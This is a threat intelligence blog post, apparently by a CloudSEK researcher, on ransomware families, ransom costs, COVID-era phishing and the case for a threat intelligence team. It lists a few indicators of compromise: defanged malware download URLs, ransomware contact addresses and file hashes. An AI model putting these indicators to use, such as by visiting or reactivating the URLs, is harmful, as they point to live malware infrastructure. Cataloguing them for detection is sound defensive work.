Why you should be worried about a cyber pandemic that could take over the cyberspace

 

Companies of all sizes and sectors fall prey to data breaches and ransomware attacks. Security incident(s) that result in data leakage can stain the reputation of the concerned organization, let alone the legal battle that follows. Enterprises spend millions of money on security products to attain a comprehensive security posture, yet attackers are able to  compromise networks and exfiltrate data. Threat actors as well as state sponsored actors craft sophisticated attack vectors that are undetectable and develop zero-day exploits for applications used by victim organizations. 

Quite often, the RaaS [Ransomware as a Service] model for ransomware developers are advertised on underground hacker forums. Today, anyone can make use of the RaaS platform and become a ransomware operator. Companies pay the ransom amount, when it becomes the only viable option. This emboldens threat actors to carry out more campaigns against organizations.

State sponsored APTs are more dangerous since they are backed by nation states. Their funding never runs dry, which in turn enables them to develop complex infrastructure. Target objective is another factor that makes APTs stand out, since geopolitical factors are their primary motivation and not financial factors.

Ransomware rate

Threat Landscape

Recent trends in the cyber threat intelligence landscape involves ransomware and banking trojans. Multistage complex malware downloaders can also be found in the wild. They facilitate further dissemination of ransomware and other spyware/ trojans. Certain ransomware groups also engage in looting cryptocurrency by compromising crypto exchanges.

 

Ransomware

Ryuk

Ryuk has been spotted in various attacks targeting enterprise organizations worldwide, demanding ransom payments ranging from 15 to 50 Bitcoins (BTC); which translates to between US$97,000 and $320,000 at the time of valuation. 

 

Fig1. Popular attack vectors
Fig1. Popular attack vectors

 

Ransomware targets Windows

REvil/ Sodinokibi

REvil/ Sodinokibi ransomware was first detected in 2019, targeting the health and IT sectors. Later, it began auctioning off sensitive data over the dark web, stolen from companies using its malicious code. As part of their tactics, this ransomware group threatens to release their victims’ data, unless their ransom demands are met.

 

Dharma/ CrySiS

Dharma ransomware appends various extensions to infected files and is a variant of CrySiS. The malware has been in operation since 2016 and the threat actors behind the ransomware continue to release new variants which are not decryptable.

 

STOP/ djvu

Djvu is a high-risk virus that belongs to the STOP malware family. Firstly discovered by Michael Gillespie, this virus is categorized as ransomware and is designed to lock (encrypt) files using a cryptography algorithm. 

 

Ransomware strains reported

Fig2. Ransomware strains Q1 2020 (incl. STOP)
Fig2. Ransomware strains Q1 2020 (incl. STOP)

Cooperation between ransomware families has also been noticed to increase lately, enforcing more efficiency in operating Ransomware as a Service [RaaS] offerings.

Fig3. Ransomware strains Q1 2020 (excl. STOP)
Fig3. Ransomware strains Q1 2020 (excl. STOP)

STOP, Dharma, Phobos, and REvil have had major roles to play in the RaaS sector. They are very active, even today, carrying out their campaigns, especially Dharma and REvil.

Phishing and ransomware

Malware attacks vs. Malware-free attacks

Malware attacks are simple use cases where a malicious file is written to disk. This can be easily detected and blocked by Endpoint Detection and Response (EDR). Malware-free attacks are more in-memory code execution and credential spraying attacks that require more sophisticated detection mechanisms. We have seen an increase in malware-free attacks as part of campaigns since 2019. They successfully evade security measures and defenses set up by the enterprises.

 

Cost of a Ransomware Attack

The total cost of a ransomware attack includes the ransom amount (if paid), costs for network remediation, lost revenue, and the cost of a potential damage to the reputation of the brand. Recent trends in attacks indicate that more businesses are targeted and threatened to release data, for a ransom. 

It seems that ransomware groups have evaluated the long-term impacts of their attack on the brand image, trust, and reputation of organizations that refuse to pay up. Ryuk ransomware is largely responsible for the massive surge in ransomware demands. Ransomware operators demand an average of $288,000 for the release of systems.

Ransomware affectes business

Fig4. Largest amount of ransom reported in 2019
Fig4. Largest amount of ransom reported in 2019

 

Fig5. Largest avg. ransom pay-offs 2020
Fig5. Largest avg. ransom pay-offs in 2020

 

Ransomware statistics for 2020

Taking into account the current trend and statistics, ransomware + downtime costs for the top five countries for 2020 are estimated to be:

  • Italy: $1.1 billion – $4.3 billion
  • Germany: $1 billion – $4 billion
  • Spain: $830 million – $3.3 billion
  • UK: $469 million – $1.9 billion
  • France: $121 million – $485 million

 

Hidden Costs of ransomware

  • Downtime of Information systems
  • Loss of Reputation
  • Penalties/Fines[Compliance]
  • Legal Action from user

Avg. ransom payment

 

Cyber security during COVID-19

“WHO reports fivefold increase in cyber attacks, urges vigilance”

Threat actors have exploited COVID-19 extensively to carry out phishing attacks, masquerading as WHO and similar agencies, to deliver malware-laced emails. COVID-19-related phishing attacks went up by 667%, scams increased by 400% over the month of March 2020, making Coronavirus the largest-ever security threat. To make things worse, social distancing guidelines observed across countries forced organizations to work from remote locations, putting the security of such organizations at risk. Remote work exposed user endpoints to external threats and had the following impacts:

  • Increased security risk from remote working/ learning
  • Potential delay in cyber-attack detection and response
  • Business Continuity Plans (BCP) to feature global pandemics

 

Effective Threat Intelligence

For an average company earning $10K/ hour, operating 8 hours a day, and 5 days a week, the downtime cost is estimated at $1,760,000 each month. Estimated average downtime is 1-2 hours. Cost of 1.6 hours average downtime/ week for a Fortune 500 company is approximately $46M per year. 

A Distributed Denial of Service [DDoS] attack that temporarily disrupts the activities of a website, can last for a few days or even longer. According to the IDG DDoS report, 36% of companies that have experienced more than five DDoS attacks, suffer an average downtime of 7-12 hours.

An experienced Cyber Threat Intelligence (CTI) team gathers information from different sources and converts it into intelligence to safeguard client corporations. If an effective CTI is not part of a company’s mature security model they can fall prey to any attack at any time.

A CTI team can actively monitor and create actionable intelligence on the following areas of your business:

  • Supply chain 
  • Dark web monitoring for data leaks 
  • Zero-days
  • New emerging attack vectors

Threat intelligence must be actionable. Threat Intelligence provides Tactics, Techniques and Procedures (TTPs) and Indicators of Compromise (IoCs) to the security team, especially to the Security Operation Center (SOC) team, for proactive/ reactive measures to counter cyber threats.

 

Indicators of Compromise

These are some of the common Indicators of Compromise:

  • IP addresses, URLs and Domain names used by malware
  • Email addresses, email subject, links and attachments used by malware  
  • Registry keys, filenames and file hashes and DLLs of malware 
Examples
  • hxxp://45.142.213.230/bssd [sectopRAT Trojan]
  • hxxp://45.142.213.230/blad [SectopRAT Trojan]
  • [email protected] [djvu ransomware]
  • [email protected]     [djvu ransomware]
  • ef95c48e750c1a3b1af8f5446fa04f54 [maze]
  • f04d404d84be66e64a584d425844b926 [maze]

 

Tactics, Techniques, Procedures/ TTPs

TTPs define the behaviour of a threat actor or group and explain how the actor carries out an attack against the network and makes a lateral movement within the intranet. 

MITRE ATT&CK is the most widely used, open-source threat intelligence framework to understand adversary tactics and techniques. There are 11 tactics and 291 techniques listed in this framework.

 

Example of Tactic and Technique

 

Tactic 
Techniques
Initial Access T1193: Spear Phishing Attachment
Execution T1059: Command-Line Interface

T1086: PowerShell

T1085: Rundll32

T1064: Scripting

T1204: User Execution

T1028: Windows Remote Management

 

The efficacy of a CTI team to predict the possibility of an occurrence and ensure effective implementation of mitigation measures is essential to the survival of any organisation in their current realm of operations.

 

Conclusion

To further their nefarious intentions, threat actors arm themselves with sophisticated tools and advanced capabilities. It is quite difficult for the law enforcement as well as cyber security practitioners to keep pace with these actors. An effective CTI system can help organizations contain the attack within the network, reduce associated costs, and minimize data loss. Investing in a strong CTI system will allow security operation centers to predict and mitigate attacks proactively. However, a CTI system is only as strong as its weakest link: humans. Human errors can cause even the most impenetrable, robust security system to fail. A good security system monitors information systems and applications and conducts regular vulnerability assessments and pentesting. But, a comprehensive security system prioritizes employee/ user training and updation on cyber hygiene and best practices.

Anandeshwar Unnikrishnan
Threat Intelligence Researcher , CloudSEK
Anandeshwar is a Threat Intelligence Researcher at CloudSEK. He is a strong advocate of offensive cybersecurity. He is fuelled by his passion for cyber threats in a global context. He dedicates much of his time on Try Hack Me/ Hack The Box/ Offensive Security Playground. He believes that “a strong mind starts with a strong body.” When he is not gymming, he finds time to nurture his passion for teaching. He also likes to travel and experience new cultures.
This is Alt
Total Posts: 0
Hitesh is a certified ethical hacker and is a part of CloudSEK’s threat research squad. Before CloudSEK, he worked as a Threat Research Analyst at DSCI, India. Hitesh also likes to travel and explore new cities and places.
×
Anandeshwar Unnikrishnan
Threat Intelligence Researcher , CloudSEK
Anandeshwar is a Threat Intelligence Researcher at CloudSEK. He is a strong advocate of offensive cybersecurity. He is fuelled by his passion for cyber threats in a global context. He dedicates much of his time on Try Hack Me/ Hack The Box/ Offensive Security Playground. He believes that “a strong mind starts with a strong body.” When he is not gymming, he finds time to nurture his passion for teaching. He also likes to travel and experience new cultures.
Latest Posts
CloudSEK is continuously analyzing the Surface, Deep and Dark web to identify the emerging threat indicators and trends. For real-time threats emerging against your organization or industry, you can request a demo for free.